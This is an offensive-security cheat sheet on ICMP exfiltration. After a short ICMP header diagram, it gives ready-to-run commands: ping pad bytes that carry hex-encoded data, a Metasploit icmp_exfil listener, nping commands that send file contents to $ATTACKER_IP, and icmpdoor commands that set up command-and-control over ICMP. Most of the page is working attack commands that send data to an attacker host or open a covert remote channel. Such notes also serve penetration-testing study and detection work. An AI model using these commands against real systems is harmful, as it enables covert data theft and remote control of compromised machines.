# ICMP Exfiltration
* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm)
* Type 0, which is Echo Reply contains an optional data field inside the header
```
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| |
+ Data +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```
## Usage
* The `Pattern` parameter can be used to pad the bytes. From the manual
```
-p pattern
You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
```
* Pad hex values
```sh
ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p )
```
### Metasploit ICMP Exfiltration
* Awaiting ICMP data on Attacker
```sh
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set interface <interface>
run
```
* Exfiltrating from target via `ping` shown above or use `nping`
* Starting the transmission via `nping` and BOF
```sh
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"
```
### C2 over ICMP
* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor)
* On target
```sh
sudo icmpdoor -i <interface> -d $ATTACKER_IP
```
* On attacker
```sh
sudo icmp-cnc -i <interface> -d $TARGET_IP
```